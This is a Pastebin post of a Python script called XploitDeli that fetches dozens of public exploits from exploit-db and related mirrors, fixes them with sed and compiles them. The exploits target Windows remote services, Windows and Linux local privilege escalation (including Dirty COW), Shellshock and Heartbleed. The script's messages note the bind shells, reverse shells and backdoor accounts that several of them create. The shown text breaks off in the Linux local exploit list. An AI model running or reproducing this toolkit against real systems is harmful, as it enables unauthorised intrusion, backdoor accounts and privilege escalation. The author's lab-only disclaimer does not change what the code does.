Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- ###################################################
- #
- # XploitDeli - written by Justin Ohneiser
- # ------------------------------------------------
- # This program produces a variety of exploits
- # found on exploit-db for immediate use.
- #
- # Note: options with an asterisk either don't work
- # or require compilation on the target.
- #
- # [Warning]:
- # This script comes as-is with no promise of functionality or accuracy. I strictly wrote it for personal use
- # I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
- # functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
- # target machines in a lab environment so please only use it against systems for which you have permission!!
- #-------------------------------------------------------------------------------------------------------------
- # [Modification, Distribution, and Attribution]:
- # You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
- # author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
- # worth anything anyway :)
- #
- # Designed for use in Kali Linux 4.6.0-kali1-686
- ###################################################
- import sys, os, subprocess
- # ------------------------------------
- # WINDOWS REMOTE
- # ------------------------------------
- def windows_exploit_suggester():
- commands = [
- ('Downloading...','wget https://github.com/GDSSecurity/Windows-Exploit-Suggester/archive/master.zip'),
- ('Upacking...','unzip master.zip; cp Windows-Exploit-Suggester-master/windows-exploit-suggester.py .'),
- ('Updating...','./windows-exploit-suggester.py -u'),
- ('Cleaning up...','rm master.zip; rm -r Windows-Exploit-Suggester-master')
- ]
- if run(commands):
- printGood("windows-exploit-suggester.py successfully created\n\tUsage: ./windows-exploit-suggester.py -d <database file> -o <os description> [--remote | --local]")
- def ms03_026():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/100 -O ms03-026.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms03-026.c -o ms03-026.exe -lws2_32'),
- ('Cleaning up...','rm ms03-026.c')
- ]
- if run(commands):
- printGood("ms03-026.exe successfully created\n\t - creates user 'e' and pass 'asd#321'")
- def ms03_039_1():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/103 -O ms03-039.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms03-039.c -o ms03-039.exe -lws2_32'),
- ('Cleaning up...','rm ms03-039.c')
- ]
- if run(commands):
- printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
- def ms03_039_2():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/109 -O ms03-039.cpp'),
- ('Compiling...','i686-w64-mingw32-g++ ms03-039.cpp -o ms03-039.exe -lws2_32'),
- ('Cleaning up...','rm ms03-039.cpp')
- ]
- if run(commands):
- printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
- def ms03_049():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/119 -O ms03-049.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms03-049.c -o ms03-049.exe -lws2_32'),
- ('Cleaning up...','rm ms03-049.c')
- ]
- if run(commands):
- printGood("ms03-039.exe successfully created\n\t - spawns bind shell on port 5555")
- def ms04_007():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz -O ms04-007.tar.gz'),
- ('Unpacking...','tar xvzf ms04-007.tar.gz'),
- ('Cleaning up...','rm ms04-007.tar.gz')
- ]
- if run(commands):
- printGood("kill-bill/kill-bill.pl successfully created\n\t - spawns and connects to bind shell on port 8721")
- def ms04_011_sslbof():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/275 -O ms04-011.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
- ('Cleaning up...','rm ms04-011.c')
- ]
- if run(commands):
- printGood("ms04-011.exe successfully created\n\t - spawns and connects reverse shell on port 443")
- def ms04_011_lsasarv():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/295 -O ms04-011.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
- ('Cleaning up...','rm ms04-011.c')
- ]
- if run(commands):
- printGood("ms04-011.exe successfully created\n\t - spawns bind shell on given port")
- def ms04_031():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/734 -O ms04-031.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms04-031.c -o ms04-031.exe -lws2_32'),
- ('Cleaning up...','rm ms04-031.c')
- ]
- if run(commands):
- printGood("ms04-031.exe successfully created\n\t - spawns bind shell on given port")
- def ms05_017():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/1075 -O ms05-017.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms05-017.c -o ms05-017.exe -lws2_32'),
- ('Cleaning up...','rm ms05-017.c')
- ]
- if run(commands):
- printGood("ms05-017.exe successfully created\n\t - spawns bind shell on given port")
- def ms05_039():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/1149 -O ms05-039.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms05-039.c -o ms05-039.exe -lws2_32'),
- ('Cleaning up...','rm ms05-039.c')
- ]
- if run(commands):
- printGood("ms05-039.exe successfully created\n\t - spawns bind shell on given port")
- def ms06_040_1():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/2223 -O ms06-040.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
- ('Cleaning up...','rm ms06-040.c')
- ]
- if run(commands):
- printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 54321")
- def ms06_040_2():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/2265 -O ms06-040.c'),
- ('Fixing...',"sed -i 's/WNetAddConnection2(&nr, \"\", \"\", 0) != NO_ERROR/1==2/g' ms06-040.c;"),
- ('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
- ('Cleaning up...','rm ms06-040.c')
- ]
- if run(commands):
- printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 4444")
- def ms06_070():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/2789 -O ms06-070.c'),
- ('Fixing...',"sed -i 's/more informations/more informations\");/g' ms06-070.c; sed -i 's/see/\/\/see/g' ms06-070.c"),
- ('Compiling...','i686-w64-mingw32-gcc ms06-070.c -o ms06-070.exe -lws2_32'),
- ('Cleaning up...','rm ms06-070.c')
- ]
- if run(commands):
- printGood("ms06-070.exe successfully created\n\t - spawns bind shell on port 4444")
- def ms08_067_1():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/7104 -O ms08-067.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms08-067.c -o ms08-067.exe -lws2_32'),
- ('Cleaning up...','rm ms08-067.c')
- ]
- if run(commands):
- printGood("ms08-067.exe successfully created\n\t - spawns bind shell on port 4444")
- def ms08_067_2():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/7132 -O ms08-067.py'),
- ('Preparing...','chmod 744 ms08-067.py')
- ]
- if run(commands):
- printGood("ms08-067.py successfully created\n\t - spawns bind shell on 4444")
- def ms08_067_3():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6841.rar -O ms08-067.rar'),
- ('Unpacking...','mkdir ms08-067; cd ms08-067; unrar e ../ms08-067.rar'),
- ('Cleaning up...','rm ms08-067.rar; cp ms08-067/MS08-067.exe ms08-067.exe; rm -r ms08-067')
- ]
- if run(commands):
- printGood("ms08-067.exe successfully created\n\t")
- def ms09_050():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip -O ms09-050.zip'),
- ('Unpacking...','unzip ms09-050.zip'),
- ('Cleaning up...','rm ms09-050.zip'),
- ('Compiling...','cd smb2_exploit_release/smb2_exploit; i686-w64-mingw32-g++ smb2_exploit.cpp -o smb2_exploit.exe -lws2_32')
- ]
- if run(commands):
- printGood("/smb2_exploit_release/smb2_exploit/smb2_exploit.exe successfully created\n\t - spawns bind shell on 28876")
- exploits_windows_remote = [
- ("windows_exploit_suggester" , windows_exploit_suggester),
- ("ms03-026" , ms03_026),
- ("ms03-039 (1)" , ms03_039_1),
- ("ms03-039 (2)" , ms03_039_2),
- ("*ms03-049" , ms03_049),
- ("ms04-007" , ms04_007),
- ("ms04-011 - ssl bof" , ms04_011_sslbof),
- ("ms04-011 - lsasarv.dll" , ms04_011_lsasarv),
- ("ms04-031" , ms04_031),
- ("ms05-017" , ms05_017),
- ("ms05-039" , ms05_039),
- ("*ms06-040 (1)" , ms06_040_1),
- ("ms06-040 (2)" , ms06_040_2),
- ("ms06-070" , ms06_070),
- ("*ms08-067 (1)" , ms08_067_1),
- ("ms08-067 (2)" , ms08_067_2),
- ("ms08-067 (3)" , ms08_067_3),
- ("*ms09-050" , ms09_050)
- ]
- # ------------------------------------
- # WINDOWS LOCAL
- # ------------------------------------
- def windows_privesc_check():
- commands = [
- ('Downloading...','wget https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip -O windows-privesc-check.zip'),
- ('Unpacking','unzip windows-privesc-check.zip; cp windows-privesc-check-master/windows-privesc-check2.exe .'),
- ('Cleaning up...','rm windows-privesc-check.zip; rm -r windows-privesc-check-master')
- ]
- if run(commands):
- printGood("windows-privesc-check2.exe successfully created")
- def ms04_011_local():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/271 -O ms04-011.c'),
- ('Fixing...',"sed -i 's/Winuser.h/winuser.h/g' ms04-011.c"),
- ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -I/usr/i686-w64-mingw32/include/'),
- ('Cleaning up...','rm ms04-011.c')
- ]
- if run(commands):
- printGood("ms04-011.exe successfully created\n\t")
- def ms04_019_1():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/350 -O ms04-019.c'),
- ('Fixing...',"sed -i 's/Utility Manager and then/Utility Manager and then run\");/g' ms04-019.c; sed -i 's/run UtilManExploit2.exe/\/\/run UtilManExploit2.exe/g' ms04-019.c; sed -i 's/in the taskbar/\/\/in the taskbar/g' ms04-019.c; sed -i 's/lParam must be/\/\/lParam must be/g' ms04-019.c; sed -i 's/close open error window/\/\/close open error window/g' ms04-019.c; sed -i 's/close utility manager/\/\/close utility manager/g' ms04-019.c"),
- ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
- ('Cleaning up...','rm ms04-019.c')
- ]
- if run(commands):
- printGood("ms04-019.exe successfully created\n\t - run 'utilman.exe /start', then execute")
- def ms04_019_2():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/352 -O ms04-019.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
- ('Cleaning up...','rm ms04-019.c')
- ]
- if run(commands):
- printGood("ms04-019.exe successfully created\n\t")
- def ms04_019_3():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/355 -O ms04-019.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
- ('Cleaning up...','rm ms04-019.c')
- ]
- if run(commands):
- printGood("ms04-019.exe successfully created\n\t")
- def ms04_020():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/351 -O ms04-020.c'),
- ('Fixing...',"sed -i 's/Winsock2.h/winsock2.h/g' ms04-020.c; sed -i 's/_snprintf/\/\/_snprintf/g' ms04-020.c; sed -i 's/pax -h/\/\/pax -h/g' ms04-020.c"),
- ('Compiling...','i686-w64-mingw32-gcc ms04-020.c -o ms04-020.exe -lws2_32'),
- ('Cleaning up...','rm ms04-020.c')
- ]
- if run(commands):
- printGood("ms04-020.exe successfully created\n\t")
- def keybd():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/1197 -O keybd.c'),
- ('Compiling...','i686-w64-mingw32-gcc keybd.c -o keybd.exe -lws2_32'),
- ('Cleaning up...','rm keybd.c')
- ]
- if run(commands):
- printGood("keybd.exe successfully created\n\t - run 'runas /user:restrcited cmd.exe', 'tlist.exe | find \"explorer.exe\"' (get pid), then run keybd.exe <pid>")
- def ms05_018():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/1198 -O ms05-018.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms05-018.c -o ms05-018.exe -lws2_32 advapi32.lib'),
- ('Cleaning up...','rm ms05-018.c')
- ]
- if run(commands):
- printGood("ms05-018.exe successfully created\n\t")
- def ms05_055():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/1407 -O ms05-055.c'),
- ('Compiling...','i686-w64-mingw32-g++ ms05-055.c -o ms05-055.exe -lws2_32'),
- ('Cleaning up...','rm ms05-055.c')
- ]
- if run(commands):
- printGood("ms05-055.exe successfuly created\n\t")
- def ms06_030():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/1911 -O ms06-030.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms06-030.c -o ms06-030.exe -lws2_32'),
- ('Cleaning up...','rm ms06-030.c')
- ]
- if run(commands):
- printGood("ms06-030.exe successfully created\n\t")
- def ms06_049():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/2412 -O ms06-049.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms06-049.c -o ms06-049.exe -lws2_32'),
- ('Cleaning up...','rm ms06-049.c')
- ]
- if run(commands):
- printGood("ms06-049.exe successfully created\n\t")
- def spool():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/3220 -O spool.c'),
- ('Fixing...',"sed -i 's/Winspool.h/winspool.h/g' spool.c; sed -i 's/EnumPrintersA/\/\/EnumPrintersA/g' spool.c"),
- ('Compiling...','i686-w64-mingw32-gcc spool.c -o spool.exe'),
- ('Cleaning up...','rm spool.c')
- ]
- if run(commands):
- printGood("spool.exe successfully created\n\t - spawns bindshell on port 51477")
- def ms08_025():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip -O ms08-025.zip'),
- ('Unpacking...','mkdir ms08-025; cd ms08-025;unzip ../ms08-025.zip'),
- ('Compiling...','cd ms08-025; i686-w64-mingw32-gcc ms08-25-exploit.cpp -o ../ms08-025.exe -lws2_32'),
- ('Cleaning up...','rm ms08-025.zip; rm -r ms08-025')
- ]
- if run(commands):
- printGood("ms08_025.exe successfully created\n\t")
- def netdde():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/21923 -O netdde.c'),
- ('Fixing...',"sed -i 's/source:/\/\/source:/g' netdde.c; sed -i 's/The Winlogon/\/\/The Winlogon/g' netdde.c"),
- ('Compiling...','i686-w64-mingw32-gcc netdde.c -o netdde.exe'),
- ('Cleaning up...','rm netdde.c')
- ]
- if run(commands):
- printGood("netdde.exe successfully created\n\t")
- def ms10_015():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip -O ms10-015.zip'),
- ('Unpacking...','unzip ms10-015.zip; cp KiTrap0D/vdmallowed.exe ms10-015.exe'),
- ('Cleaning up...','rm ms10-015.zip; rm -r KiTrap0D')
- ]
- if run(commands):
- printGood("ms10-015.exe successfully created\n\t")
- def ms10_059():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14610.zip -O ms10-059.zip'),
- ('Unpacking...','unzip ms10-059.zip'),
- ('Compiling...','cd Chimichurri; i686-w64-mingw32-g++ Chimichurri.cpp -o ../ms10-059.exe -lws2_32'),
- ('Cleaning up...','rm ms10-059.zip; rm -r Chimichurri')
- ]
- if run(commands):
- printGood("ms10-059.exe successfully created\n\t")
- def ms10_092():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/15589 -O ms10-092.wsf'),
- ]
- if run(commands):
- printGood("ms10-092.wsf successfully created\n\t - use 'cscript ms10-092.wsf' to execute")
- def ms11_080():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/18176 -O ms11-080.py'),
- ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms11-080.py'),
- ('Cleaning up...','cp dist/ms11-080.exe ms11-080.exe; rm ms11-080.py; rm -r dist build ms11-080.spec')
- ]
- if run(commands):
- printGood("ms11_080.exe successfully created\n\t")
- def ms14_040():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/39525 -O ms14-040.py'),
- ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-040.py'),
- ('Cleaning up...','cp dist/ms14-040.exe ms14-040.exe; rm ms14-040.py; rm -r dist build ms14-040.spec')
- ]
- if run(commands):
- printGood("ms14-040.exe successfully created")
- def ms14_058_1():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip -O ms14-058.zip'),
- ('Unpacking...','unzip ms14-058.zip'),
- ('Compiling...','cd 39666/Exploit/Exploit; i686-w64-mingw32-g++ Exploit.cpp -o ../../../ms14-058.exe -lws2_32'),
- ('Cleaning up...','rm ms14-058.zip; rm -r 39666 __MACOSX')
- ]
- if run(commands):
- printGood("")
- def ms14_058_2():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/37064 -O ms14-058.py'),
- ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-058.py'),
- ('Cleaning up...','cp dist/ms14-058.exe ms14-058.exe; rm ms14-058.py; rm -r dist build ms14-058.spec')
- ]
- if run(commands):
- printGood("ms14-058.exe successfully created\n\t")
- def ms14_070_1():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/37755 -O ms14-070.c'),
- ('Compiling...','i686-w64-mingw32-gcc ms14-070.c -o ms14-070.exe -lws2_32'),
- ('Cleaning up...','rm ms14-070.c')
- ]
- if run(commands):
- printGood("ms14-070.exe successfully created\n\t")
- def ms14_070_2():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/35936 -O ms14-070.py'),
- ('Note: requires manual fixing, then execute the following command:','echo \'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-070.py\'')
- ]
- run(commands)
- def ms15_010_1():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip -O ms15_010.zip'),
- ('Unpacking...','unzip ms15_010.zip'),
- ('Fixing...',"cd 39035; sed -i 's/Strsafe.h/strsafe.h/g' main.cpp; sed -i 's/Shlwapi.h/shlwapi.h/g' main.cpp"),
- ('Compiling...','cd 39035; i686-w64-mingw32-g++ main.cpp -o ../ms15-010.exe'),
- ('Cleaning up...','rm ms15_010.zip; rm -r 39035')
- ]
- if run(commands):
- printGood("ms15-010.exe successfully created\n\t")
- def ms15_010_2():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/37098 -O ms15-010.cpp'),
- ('Fixing...','head -n 287 ms15-010.cpp > ex.cpp; tail -n 59 ms15-010.cpp > ex.h'),
- ('Compiling...','i686-w64-mingw32-g++ ex.cpp -o ms15-010.exe'),
- ('Cleaning up...','rm ms15-010.cpp')
- ]
- if run(commands):
- printGood("ms15-010.exe successfully created")
- def ms15_051():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe -O ms15-051_32.exe; wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe -O ms15-051_64.exe')
- ]
- if run(commands):
- printGood("ms15-051_32.exe and ms15_051_64.exe successfully created")
- def ms16_014():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip -O ms16-014.zip'),
- ('Unpacking...','unzip ms16-014.zip'),
- ('Compiling...','cd 40039; i686-w64-mingw32-g++ MS16-014.cpp -o ../ms16-014.exe'),
- ('Cleaning up...','rm -r ms16-014.zip __MACOSX')
- ]
- if run(commands):
- printGood("ms16-014.exe successfully created")
- def ms16_016():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip -O ms16-016.zip'),
- ('Unpacking...','unzip ms16-016.zip; cd 39788; unzip compiled.zip'),
- ('Cleaning up...','cp 39788/EoP.exe ms16_016.exe; cp 39788/Shellcode.dll Shellcode.dll;rm ms16-016.zip; rm -r 39788 __MACOSX')
- ]
- if run(commands):
- printGood("ms16_016.exe and Shellcode.dll successfully created")
- def ms16_032():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/39719 -O ms16_032.ps1')
- ]
- if run(commands):
- printGood("ms16_032.ps1 successfully created\n\t - for use with powershell")
- exploits_windows_local = [
- ("windows-privesc-check" , windows_privesc_check),
- ("ms04-011" , ms04_011_local),
- ("ms04-019 (1)" , ms04_019_1),
- ("ms04-019 (2)" , ms04_019_2),
- ("ms04-019 (3)" , ms04_019_3),
- ("ms04-020" , ms04_020),
- ("*keybd_event" , keybd),
- ("*ms05-018" , ms05_018),
- ("*ms05-055" , ms05_055),
- ("ms06-030" , ms06_030),
- ("ms06-049" , ms06_049),
- ("print spool service" , spool),
- ("*ms08-025" , ms08_025),
- ("netdde" , netdde),
- ("ms10-015" , ms10_015),
- ("ms10-059" , ms10_059),
- ("ms10-092" , ms10_092),
- ("ms11-080" , ms11_080),
- ("ms14-040" , ms14_040),
- ("*ms14-058 (1)" , ms14_058_1),
- ("ms14-058 (2)" , ms14_058_2),
- ("*ms14-070 (1)" , ms14_070_1),
- ("ms14-070 (2)" , ms14_070_2),
- ("*ms15-010 (1)" , ms15_010_1),
- ("*ms15-010 (2)" , ms15_010_2),
- ("ms15-051" , ms15_051),
- ("*ms16-014" , ms16_014),
- ("ms16-016" , ms16_016),
- ("ms16-032" , ms16_032)
- ]
- # ------------------------------------
- # LINUX REMOTE
- # ------------------------------------
- def shellshock():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/34900 -O shellshock.py'),
- ('Preparing...','chmod 744 shellshock.py')
- ]
- if run(commands):
- printGood("shellshock.py successfully created\n\t")
- def heartbleed():
- commands = [
- ('Downloading...','wget https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c -O heartbleed.c'),
- ('Compiling...','gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto'),
- ('Cleaning up...','rm heartbleed.c')
- ]
- if run(commands):
- printGood("heartbleed successfully created\n\tUsage: heartbleed -s <target> -p <port> -f <output file> -v -t 1")
- exploits_linux_remote = [
- ("shellshock" , shellshock),
- ("heartbleed" , heartbleed)
- ]
- # ------------------------------------
- # LINUX LOCAL
- # -- These should be compiled on target if possible
- # ------------------------------------
- def linux_exploit_suggester():
- commands = [
- ('Downloading...','apt-get install linux-exploit-suggester'),
- ('Cleaning up...','cp /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl linux-exploit-suggester.pl')
- ]
- if run(commands):
- printGood("linux-exploit-suggester.pl successfully created\n\tUsage: perl linux-exploit-suggester.pl -k <kernel>")
- def unix_privesc_check():
- commands = [
- ('Downloading...','wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz'),
- ('Unpacking...','tar xvzf unix-privesc-check-1.4.tar.gz; cp unix-privesc-check-1.4/unix-privesc-check .'),
- ('Cleaning up...','rm unix-privesc-check-1.4.tar.gz; rm -r unix-privesc-check-1.4')
- ]
- if run(commands):
- printGood("unix_privesc_check successfully created")
- def sendpage_1():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/9545 -O sendpage.c'),
- ('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"')
- ]
- run(commands)
- def sendpage_2():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/9479 -O sendpage.c'),
- ('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"')
- ]
- run(commands)
- def ftruncate():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/6851 -O ftruncate.c'),
- ('Compile with:','echo "gcc -o ftruncate ftruncate.c"'),
- ('Note: use in world-writable directory, located using the following command:','echo "find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx""')
- ]
- run(commands)
- def cap_sys_admin():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/15944 -O cap_sys_admin.c'),
- ('Compile with:','echo "gcc -w cap_sys_admin.c -o cap_sys_admin_expl"')
- ]
- run(commands)
- def compat():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/15024 -O compat.c'),
- ('Compile with:','echo "gcc -o compat compat.c"')
- ]
- run(commands)
- def can_bcm():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/14814 -O can_bcm_expl.c'),
- ('Compile with:','echo "gcc -o can_bcm_expl can_bcm_expl.c"')
- ]
- run(commands)
- def rdsProtocol():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/15285 -O rds_expl.c'),
- ('Compile with:','echo "gcc -o rds_expl rds_expl.c"')
- ]
- run(commands)
- def halfNelson():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/17787 -O half-nelson.c'),
- ('Compile with:','echo "gcc -o half-nelson half-nelson.c -lrt"')
- ]
- run(commands)
- def fullNelson():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/15704 -O full-nelson.c'),
- ('Compile with:','echo "gcc -o full-nelson full-nelson.c"')
- ]
- run(commands)
- def udev():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/8572 -O udev_expl.c'),
- ('Compile with:','echo "gcc -o udev_expl udev_expl.c"')
- ]
- run(commands)
- def sgid():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/33824 -O sgid_expl.c'),
- ('Compile with:','echo "gcc -o sgid_expl sgid_expl.c"')
- ]
- run(commands)
- def overlayfs_1():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/37292 -O overlayfs.c'),
- ('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
- ]
- run(commands)
- def libfutex():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/35370 -O libfutex.c'),
- ('Compile with:','echo "gcc -o libfutex libfutex.c -lpthread"')
- ]
- run(commands)
- def mempodipper():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/18411 -O mempodipper.c'),
- ('Compile with:','echo "gcc -o mempodipper mempodipper.c"')
- ]
- run(commands)
- def alpha_omega():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/17391 -O alpha-omega.c'),
- ('Compile with:','echo "gcc -o alpha-omega alpha-omega.c"')
- ]
- run(commands)
- def dirtycow():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/40616 -O dirtycow_64.c'),
- ('Fixing...',"cp dirtycow_64.c dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/\/* 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 177;/unsigned int sc_len = 177; *\//g' dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/*\/ 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 136;/unsigned int sc_len = 136;\/*/g' dirtycow_32.c"),
- ('Compile with:','echo "gcc -o dirtycow_64 dirtycow_64.c -pthread"; echo "gcc -o dirtycow_32 dirtycow_32.c -pthread"')
- ]
- run(commands)
- def msr():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/27297 -O msr_expl.c'),
- ('Compile with:','echo "gcc -o msr_expl msr_expl.c"')
- ]
- run(commands)
- def perf_swevent_init():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/26131 -O perf.c'),
- ('Compile with:','echo "gcc -o perf perf.c"')
- ]
- run(commands)
- def overlayfs_2():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/39166 -O overlayfs.c'),
- ('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
- ]
- run(commands)
- def overlayfs_3():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/39230 -O overlayfs.c'),
- ('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
- ]
- run(commands)
- def af_packet():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/40871 -O af_packet.c'),
- ('Compile with: ','echo "gcc -o af_packet af_packet.c -lpthread"')
- ]
- run(commands)
- def double_fdput():
- commands = [
- ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip -O double_fdput.zip'),
- ('Unpacking...','unzip double_fdput.zip; cd 39772; tar xvf exploit.tar;'),
- ('Compile with: ','echo "cd 39772/ebpf_mapfd_doubleput_exploit; ./compile.sh"'),
- ('Run ./doubleput','')
- ]
- run(commands)
- def netfilter():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/40049 -O netfilter.c'),
- ('Fixing...','tail -n 50 netfilter.c > pwn.c; head -n 213 netfilter.c > intermediate.c; tail -n 208 intermediate.c > decr.c'),
- ('Compile with:','echo "gcc -o decr decr.c -m32 -O2; gcc pwn.c -O2 -o pwn"'),
- ('Run decr, then pwn',''),
- ('Cleaning up...','rm netfilter.c intermediate.c')
- ]
- run(commands)
- def refcount():
- commands = [
- ('Downloading...','wget https://www.exploit-db.com/download/39277 -O refcount.c'),
- ('Compile with:','echo "gcc -o refcount refcount.c -lkeyutils -Wall"')
- ]
- run(commands)
- exploits_linux_local = [
- ("linux-exploit-suggester" , linux_exploit_suggester),
